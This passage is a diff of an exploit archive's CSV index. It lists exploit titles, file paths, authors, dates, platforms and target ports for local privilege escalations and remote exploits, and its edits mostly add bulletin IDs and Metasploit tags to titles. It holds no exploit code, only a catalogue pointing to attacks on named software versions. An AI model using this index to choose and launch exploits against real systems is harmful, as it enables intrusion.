Buffer Overflow",2015-03-22,"TUNISIAN CYBER",windows,local,0 36476,platforms/windows/local/36476.txt,"Kaspersky Internet Security/Anti-Virus - '.cfg' File Memory Corruption",2011-12-21,"Vulnerability Research Laboratory",windows,local,0 36501,platforms/windows/local/36501.py,"Mini-stream Ripper 2.7.7.100 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 @@ -8329,12 +8335,12 @@ id,file,description,date,author,platform,type,port 37292,platforms/linux/local/37292.c,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation",2015-06-16,rebel,linux,local,0 37293,platforms/linux/local/37293.txt,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow)",2015-06-16,rebel,linux,local,0 37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0 -37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit (Metasploit)",2015-06-24,Metasploit,windows,local,0 +37367,platforms/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k Exploit (MS15-051) (Metasploit)",2015-06-24,Metasploit,windows,local,0 37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - Buffer Overflow (SEH)",2015-07-08,Vulnerability-Lab,windows,local,0 40709,platforms/aix/local/40709.sh,"IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0 37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Function Local Information Disclosure",2012-07-26,"Jay Fenlason",linux,local,0 37631,platforms/linux/local/37631.c,"GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0 -37657,platforms/windows/local/37657.txt,"Microsoft Word - Local Machine Zone Remote Code Execution",2015-07-20,"Eduardo Braun Prado",windows,local,0 +37657,platforms/windows/local/37657.txt,"Microsoft Word - Local Machine Zone Remote Code Execution (MS15-022)",2015-07-20,"Eduardo Braun Prado",windows,local,0 37670,platforms/osx/local/37670.sh,"Apple Mac OSX 10.10 - DYLD_PRINT_TO_FILE Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0 37699,platforms/windows/local/37699.py,"Foxit Reader - '.png' Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0 37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III - '.h3m' Map file Buffer Overflow (Metasploit)",2015-08-07,Metasploit,windows,local,0 @@ -8354,7 +8360,7 @@ id,file,description,date,author,platform,type,port 37772,platforms/multiple/local/37772.js,"Mozilla Firefox < 39.03 - 'pdf.js' Same Origin Policy Exploit",2015-08-15,"Tantaryu MING",multiple,local,0 37780,platforms/windows/local/37780.c,"ThinPrint - 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution",2012-09-04,"Moshe Zioni",windows,local,0 37799,platforms/windows/local/37799.py,"MASM321 11 Quick Editor - (.qeditor) 4.0g- .qse SEH Based Buffer Overflow (ASLR & SAFESEH Bypass)",2015-08-17,St0rn,windows,local,0 -37813,platforms/windows/local/37813.rb,"VideoCharge Studio - Buffer Overflow (SEH)",2015-08-18,Metasploit,windows,local,0 +37813,platforms/windows/local/37813.rb,"VideoCharge Studio - Buffer Overflow (SEH) (Metasploit)",2015-08-18,Metasploit,windows,local,0 37937,platforms/linux/local/37937.c,"Linux Kernel 3.2.x - 'uname()' System Call Local Information Disclosure",2012-10-09,"Brad Spengler",linux,local,0 37890,platforms/windows/local/37890.py,"Multiple ChiefPDF Software 2.0 - Buffer Overflow",2015-08-20,metacom,windows,local,0 37898,platforms/linux/local/37898.py,"Reaver Pro - Privilege Escalation",2012-09-30,infodox,linux,local,0 @@ -8374,14 +8380,14 @@ id,file,description,date,author,platform,type,port 38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0 38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite (SEH) Buffer Overflow",2015-09-15,Un_N0n,windows,local,0 38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 -38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak",2015-09-15,"Google Security Research",windows,local,0 +38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)",2015-09-15,"Google Security Research",windows,local,0 38200,platforms/windows/local/38200.txt,"Microsoft Windows Task Scheduler - DeleteExpiredTaskAfter File Deletion Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38201,platforms/windows/local/38201.txt,"Microsoft Windows - CreateObjectTask TileUserBroker Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38202,platforms/windows/local/38202.txt,"Microsoft Windows - CreateObjectTask SettingsSyncDiagnostics Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38218,platforms/windows/local/38218.py,"IKEView.exe R60 - '.elg' Local SEH Exploit",2015-09-17,cor3sm4sh3r,windows,local,0 38219,platforms/windows/local/38219.py,"ZTE PC UI USB Modem Software - Buffer Overflow",2015-09-17,R-73eN,windows,local,0 38220,platforms/windows/local/38220.py,"IKEView R60 - Buffer Overflow Local Exploit (SEH)",2015-09-17,VIKRAMADITYA,windows,local,0 -38222,platforms/win_x86-64/local/38222.rb,"Microsoft Windows - Font Driver Buffer Overflow (MS15-078)",2015-09-17,Metasploit,win_x86-64,local,0 +38222,platforms/win_x86-64/local/38222.rb,"Microsoft Windows - Font Driver Buffer Overflow (MS15-078) (Metasploit)",2015-09-17,Metasploit,win_x86-64,local,0 38232,platforms/linux/local/38232.txt,"GNU Coreutils 'sort' Text Utility - Buffer Overflow",2013-01-21,anonymous,linux,local,0 38243,platforms/windows/local/38243.py,"Total Commander 8.52 - Buffer Overflow (Windows 10)",2015-09-20,VIKRAMADITYA,windows,local,0 38244,platforms/windows/local/38244.py,"Total Commander 8.52 - Buffer Overflow",2015-09-20,VIKRAMADITYA,windows,local,0 @@ -8465,6 +8471,7 @@ id,file,description,date,author,platform,type,port 39310,platforms/windows/local/39310.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 39311,platforms/windows/local/39311.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 40360,platforms/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",linux,local,3306 +40774,platforms/linux/local/40774.sh,"Nagios 4.2.2 - Privilege Escalation",2016-11-18,"Vincent Malguy",linux,local,0 39340,platforms/android/local/39340.cpp,"Android - 'sensord' Privilege Escalation",2016-01-27,s0m3b0dy,android,local,0 39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0 39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0 @@ -8511,7 +8518,7 @@ id,file,description,date,author,platform,type,port 39772,platforms/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Privilege Escalation",2016-05-04,"Google Security Research",linux,local,0 39786,platforms/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation",2016-05-09,LiquidWorm,windows,local,0 39788,platforms/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,windows,local,0 -39791,platforms/multiple/local/39791.rb,"ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)",2016-05-09,Metasploit,multiple,local,0 +39791,platforms/multiple/local/39791.rb,"ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit)",2016-05-09,Metasploit,multiple,local,0 39803,platforms/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",windows,local,0 39804,platforms/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 < 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local,0 39809,platforms/windows/local/39809.cs,"Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0 @@ -8541,12 +8548,12 @@ id,file,description,date,author,platform,type,port 40039,platforms/win_x86/local/40039.cpp,"Microsoft Windows 7 SP1 (x86) - Privilege Escalation (MS16-014)",2016-06-29,blomster81,win_x86,local,0 40040,platforms/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution",2016-06-29,Cr4sh,windows,local,0 40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0 -40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset OOB Privilege Escalation",2016-07-03,vnik,linux,local,0 +40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation",2016-07-03,vnik,linux,local,0 40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0 40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0 40071,platforms/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0 40072,platforms/windows/local/40072.txt,"InstantHMI 6.1 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0 -40107,platforms/windows/local/40107.rb,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0 +40107,platforms/windows/local/40107.rb,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) (Metasploit)",2016-07-13,Metasploit,windows,local,0 40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0 40118,platforms/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0 40132,platforms/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Privilege Escalation (1)",2016-07-20,LiquidWorm,windows,local,0 @@ -8554,7 +8561,7 @@ id,file,description,date,author,platform,type,port 40148,platforms/windows/local/40148.py,"Mediacoder 0.8.43.5852 - '.m3u' SEH Exploit",2016-07-25,"Karn Ganeshen",windows,local,0 40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - '.m3u' Stack Overflow (Egghunter + ASLR Bypass)",2016-07-25,"Karn Ganeshen",windows,local,0 40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) - 'vmci.sys' (PoC)",2013-03-06,"Artem Shishkin",multiple,local,0 -40169,platforms/linux/local/40169.txt,"VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)",2013-08-22,"Tavis Ormandy",linux,local,0 +40169,platforms/linux/local/40169.txt,"VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation",2013-08-22,"Tavis Ormandy",linux,local,0 40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - '.pls' Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0 40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0 40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0 @@ -8637,6 +8644,8 @@ id,file,description,date,author,platform,type,port 40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0 +40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS root_trace - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0 +40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS root_reboot - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -8647,7 +8656,7 @@ id,file,description,date,author,platform,type,port 18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Root Exploit",2003-04-23,truff,linux,remote,0 19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Root Exploit",2003-04-25,blightninjas,linux,remote,1723 20,platforms/windows/remote/20.txt,"Microsoft Windows - SMB Authentication Remote Exploit",2003-04-25,"Haamed Gheibi",windows,remote,139 -23,platforms/windows/remote/23.c,"RealServer < 8.0.2 - Remote Exploit (Windows Platforms)",2003-04-30,"Johnny Cyberpunk",windows,remote,554 +23,platforms/windows/remote/23.c,"RealServer < 8.0.2 (Windows Platforms) - Remote Exploit",2003-04-30,"Johnny Cyberpunk",windows,remote,554 24,platforms/linux/remote/24.c,"Sendmail 8.12.8 - Prescan() BSD Remote Root Exploit",2003-04-30,bysin,linux,remote,25 25,platforms/linux/remote/25.c,"OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",linux,remote,0 26,platforms/linux/remote/26.sh,"OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote Users Ident",2003-05-02,"Nicolas Couture",linux,remote,0 @@ -8676,7 +8685,7 @@ id,file,description,date,author,platform,type,port 58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504 63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - Remote GID Root Exploit",2003-07-25,"the itch",linux,remote,1114 64,platforms/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135 -66,platforms/windows/remote/66.c,"Microsoft Windows 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135 +66,platforms/windows/remote/66.c,"Microsoft Windows Server 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135 67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80 69,platforms/windows/remote/69.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (1)",2003-07-29,pHrail,windows,remote,135 70,platforms/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (2)",2003-07-30,anonymous,windows,remote,135 @@ -8709,7 +8718,7 @@ id,file,description,date,author,platform,type,port 112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow",2003-10-21,blasty,windows,remote,0 116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515 117,platforms/windows/remote/117.c,"Microsoft Windows 2000/XP - RPC Remote (Non Exec Memory) Exploit",2003-11-07,ins1der,windows,remote,135 -119,platforms/windows/remote/119.c,"Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0 +119,platforms/windows/remote/119.c,"Microsoft Windows Server 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0 121,platforms/windows/remote/121.c,"Microsoft FrontPage Server Extensions - 'fp30reg.dll' Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 123,platforms/windows/remote/123.c,"Microsoft Windows - Workstation Service WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0 124,platforms/windows/remote/124.pl,"IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80 @@ -8775,7 +8784,7 @@ id,file,description,date,author,platform,type,port 291,platforms/linux/remote/291.c,"TCP Connection Reset - Remote Exploit",2004-04-23,"Paul A. Watson",linux,remote,0 293,platforms/windows/remote/293.c,"Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011)",2004-04-24,sbaa,windows,remote,445 294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 - (connectedNodes.ovpl) Remote Root Exploit",2004-04-28,FX,hardware,remote,8000 -295,platforms/windows/remote/295.c,"Microsoft Windows 2000/XP - 'Lsasrv.dll' Remote Universal Exploit (MS04-011)",2004-04-29,houseofdabus,windows,remote,445 +295,platforms/windows/remote/295.c,"Microsoft Windows Server 2000/XP - 'Lsasrv.dll' Remote Universal Exploit (MS04-011)",2004-04-29,houseofdabus,windows,remote,445 296,platforms/linux/remote/296.c,"XChat 1.8.0/2.0.8 socks5 - Remote Buffer Overflow",2004-05-05,vade79,linux,remote,0 297,platforms/windows/remote/297.c,"Sasser Worm ftpd - Remote Buffer Overflow (port 5554)",2004-05-16,mandragore,windows,remote,5554 300,platforms/multiple/remote/300.c,"CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow Root Exploit",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401 @@ -8933,7 +8942,7 @@ id,file,description,date,author,platform,type,port 902,platforms/linux/remote/902.c,"mtftpd 0.0.3 - Remote Root Exploit",2005-03-29,darkeagle,linux,remote,21 903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 < 2.2.8 - (imapmagicplus) Remote Exploit",2005-03-29,crash-x,linux,remote,143 906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)",2005-04-01,class101,windows,remote,20031 -909,platforms/windows/remote/909.cpp,"Microsoft Windows - 'WINS' Remote Buffer Overflow (3)",2005-04-12,class101,windows,remote,42 +909,platforms/windows/remote/909.cpp,"Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)",2005-04-12,class101,windows,remote,42 915,platforms/linux/remote/915.c,"MailEnable Enterprise 1.x - Imapd Remote Exploit",2005-04-05,Expanders,linux,remote,143 930,platforms/windows/remote/930.html,"Microsoft Internet Explorer - DHTML Object Memory Corruption",2005-04-12,Skylined,windows,remote,0 934,platforms/linux/remote/934.c,"gld 1.4 - (Postfix Greylisting Daemon) Remote Format String",2005-04-13,Xpl017Elz,linux,remote,2525 @@ -8968,7 +8977,7 @@ id,file,description,date,author,platform,type,port 1047,platforms/linux/remote/1047.pl,"ViRobot Advanced Server 2.0 - (addschup) Remote Cookie Exploit",2005-06-14,"Kevin Finisterre",linux,remote,8080 1055,platforms/linux/remote/1055.c,"PeerCast 0.1211 - Remote Format String",2005-06-20,darkeagle,linux,remote,7144 1066,platforms/windows/remote/1066.cpp,"Microsoft Outlook Express - NNTP Buffer Overflow (MS05-030)",2005-06-24,eyas,windows,remote,0 -1075,platforms/windows/remote/1075.c,"Microsoft Windows Message - Queuing Buffer Overflow Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103 +1075,platforms/windows/remote/1075.c,"Microsoft Windows Message Queuing - Buffer Overflow Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103 1079,platforms/windows/remote/1079.html,"Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote Exploit",2005-07-05,k-otik,windows,remote,0 1081,platforms/hardware/remote/1081.c,"Nokia Affix < 3.2.0 - btftp Remote Client Exploit",2005-07-03,"Kevin Finisterre",hardware,remote,0 1089,platforms/windows/remote/1089.c,"Mozilla FireFox 1.0.1 - Remote GIF Heap Overflow",2005-07-05,darkeagle,windows,remote,0 @@ -8996,8 +9005,8 @@ id,file,description,date,author,platform,type,port 1167,platforms/solaris/remote/1167.pm,"Solaris 10 LPD - Arbitrary File Delete Exploit (Metasploit)",2005-08-19,Optyx,solaris,remote,0 1171,platforms/linux/remote/1171.c,"Elm < 2.5.8 - (Expires Header) Remote Buffer Overflow",2005-08-22,c0ntex,linux,remote,0 1178,platforms/windows/remote/1178.c,"Microsoft IIS 5.0 - (500-100.asp) Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0 -1179,platforms/windows/remote/1179.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (Spanish)",2005-08-25,RoMaNSoFt,windows,remote,445 -1180,platforms/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French)",2005-08-25,"Fabrice Mourron",windows,remote,445 +1179,platforms/windows/remote/1179.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (Spanish) (MS05-039)",2005-08-25,RoMaNSoFt,windows,remote,445 +1180,platforms/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French) (MS05-039)",2005-08-25,"Fabrice Mourron",windows,remote,445 1183,platforms/windows/remote/1183.c,"Battlefield (BFCC/BFVCC/BF2CC) - Login Bypass/Pass Stealer/Denial of Service",2005-08-29,"Luigi Auriemma",windows,remote,0 1184,platforms/windows/remote/1184.c,"Savant Web Server 3.1 - Remote Buffer Overflow (2)",2005-08-30,basher13,windows,remote,80 1188,platforms/multiple/remote/1188.c,"HP OpenView Network Node Manager 7.50 - Remote Exploit",2005-08-30,Lympex,multiple,remote,0 @@ -9120,8 +9129,8 @@ id,file,description,date,author,platform,type,port 2054,platforms/windows/remote/2054.txt,"Microsoft Windows - DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0 2061,platforms/multiple/remote/2061.txt,"Apache Tomcat < 5.5.17 - Remote Directory Listing",2006-07-23,"ScanAlert Security",multiple,remote,0 2070,platforms/windows/remote/2070.pl,"SIPfoundry sipXtapi - (CSeq) Remote Buffer Overflow",2006-07-24,"Jacopo Cervini",windows,remote,5060 -2074,platforms/windows/remote/2074.pm,"eIQnetworks License Manager - Remote Buffer Overflow (1) (Metasploit)",2006-07-26,ri0t,windows,remote,10616 -2075,platforms/windows/remote/2075.pm,"eIQnetworks License Manager - Remote Buffer Overflow (2) (Metasploit)",2006-07-26,ri0t,windows,remote,0 +2074,platforms/windows/remote/2074.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1)",2006-07-26,ri0t,windows,remote,10616 +2075,platforms/windows/remote/2075.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)",2006-07-26,ri0t,windows,remote,0 2076,platforms/windows/remote/2076.pl,"AIM Triton 1.0.4 - (SipXtapi) Remote Buffer Overflow (PoC)",2006-07-26,c0rrupt,windows,remote,5061 2079,platforms/windows/remote/2079.pl,"eIQnetworks ESA - (Syslog Server) Remote Buffer Overflow",2006-07-27,"Kevin Finisterre",windows,remote,12345 2080,platforms/windows/remote/2080.pl,"eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)",2006-07-27,"Kevin Finisterre",windows,remote,10616 @@ -9144,7 +9153,7 @@ id,file,description,date,author,platform,type,port 2320,platforms/windows/remote/2320.txt,"IBM Director < 5.10 - (Redirect.bat) Directory Traversal",2006-09-07,"Daniel Clemens",windows,remote,411 2328,platforms/windows/remote/2328.php,"RaidenHTTPD 1.1.49 - (SoftParserFileXml) Remote Code Execution",2006-09-08,rgod,windows,remote,80 2345,platforms/windows/remote/2345.pl,"Mercur MailServer 5.0 SP3 - (IMAP) Remote Buffer Overflow (2)",2006-09-11,"Jacopo Cervini",windows,remote,143 -2355,platforms/windows/remote/2355.pm,"Microsoft Windows 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",windows,remote,445 +2355,platforms/windows/remote/2355.pm,"Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",windows,remote,445 2358,platforms/windows/remote/2358.c,"Microsoft Internet Explorer - COM Object Remote Heap Overflow",2006-09-13,nop,windows,remote,0 2401,platforms/windows/remote/2401.c,"Ipswitch WS_FTP LE 5.08 - (PASV Response) Remote Buffer Overflow",2006-09-20,h07,windows,remote,0 2403,platforms/windows/remote/2403.c,"Microsoft Internet Explorer - (VML) Remote Buffer Overflow",2006-09-20,nop,windows,remote,0 @@ -9174,13 +9183,13 @@ id,file,description,date,author,platform,type,port 2743,platforms/windows/remote/2743.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (1)",2006-11-08,anonymous,windows,remote,0 2749,platforms/windows/remote/2749.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (2)",2006-11-10,~Fyodor,windows,remote,0 2753,platforms/windows/remote/2753.c,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (3)",2006-11-10,M03,windows,remote,0 -2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (1) (Metasploit)",2006-11-13,"H D Moore",windows,remote,0 +2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (1)",2006-11-13,"H D Moore",windows,remote,0 2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (1)",2006-11-13,"H D Moore",windows,remote,0 2784,platforms/multiple/remote/2784.html,"Links 1.00pre12 - (smbclient) Remote Code Execution",2006-11-14,"Teemu Salmela",multiple,remote,0 2785,platforms/windows/remote/2785.c,"WinZip 10.0.7245 - (FileView ActiveX) Remote Buffer Overflow",2006-11-15,prdelka,windows,remote,0 2789,platforms/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,windows,remote,0 2800,platforms/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0 -2809,platforms/windows/remote/2809.py,"Microsoft Windows - NetpManageIPCConnect - Stack Overflow (Python)",2006-11-18,"Winny Thomas",windows,remote,445 +2809,platforms/windows/remote/2809.py,"Microsoft Windows - NetpManageIPCConnect - Stack Overflow (MS06-070) (Python)",2006-11-18,"Winny Thomas",windows,remote,445 2821,platforms/windows/remote/2821.c,"XMPlay 3.3.0.4 - (PLS) Local+Remote Buffer Overflow",2006-11-21,"Greg Linares",windows,remote,0 2837,platforms/multiple/remote/2837.sql,"Oracle 9i / 10g - (read/write/execute) Exploitation Suite",2006-11-23,"Marco Ivaldi",multiple,remote,0 2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - (sreplace) Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21 @@ -9357,8 +9366,8 @@ id,file,description,date,author,platform,type,port 4053,platforms/windows/remote/4053.c,"Yahoo! Messenger Webcam 8.1 - 'Ywcupl.dll' Download / Execute Exploit",2007-06-08,Excepti0n,windows,remote,0 4060,platforms/windows/remote/4060.html,"TEC-IT TBarCode - OCX ActiveX Arbitrary File Overwrite",2007-06-12,shinnai,windows,remote,0 4061,platforms/windows/remote/4061.html,"Apple Safari 3 for Windows Beta - Remote Command Execution (PoC)",2007-06-12,"Thor Larholm",windows,remote,0 -4065,platforms/windows/remote/4065.html,"Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow",2007-06-13,rgod,windows,remote,0 -4066,platforms/windows/remote/4066.html,"Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow",2007-06-13,rgod,windows,remote,0 +4065,platforms/windows/remote/4065.html,"Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow (MS07-033)",2007-06-13,rgod,windows,remote,0 +4066,platforms/windows/remote/4066.html,"Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow (MS07-033)",2007-06-13,rgod,windows,remote,0 4087,platforms/linux/remote/4087.c,"BitchX 1.1-final - (EXEC) Remote Command Execution",2007-06-21,clarity_,linux,remote,0 4093,platforms/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow",2007-06-22,eliteboy,multiple,remote,80 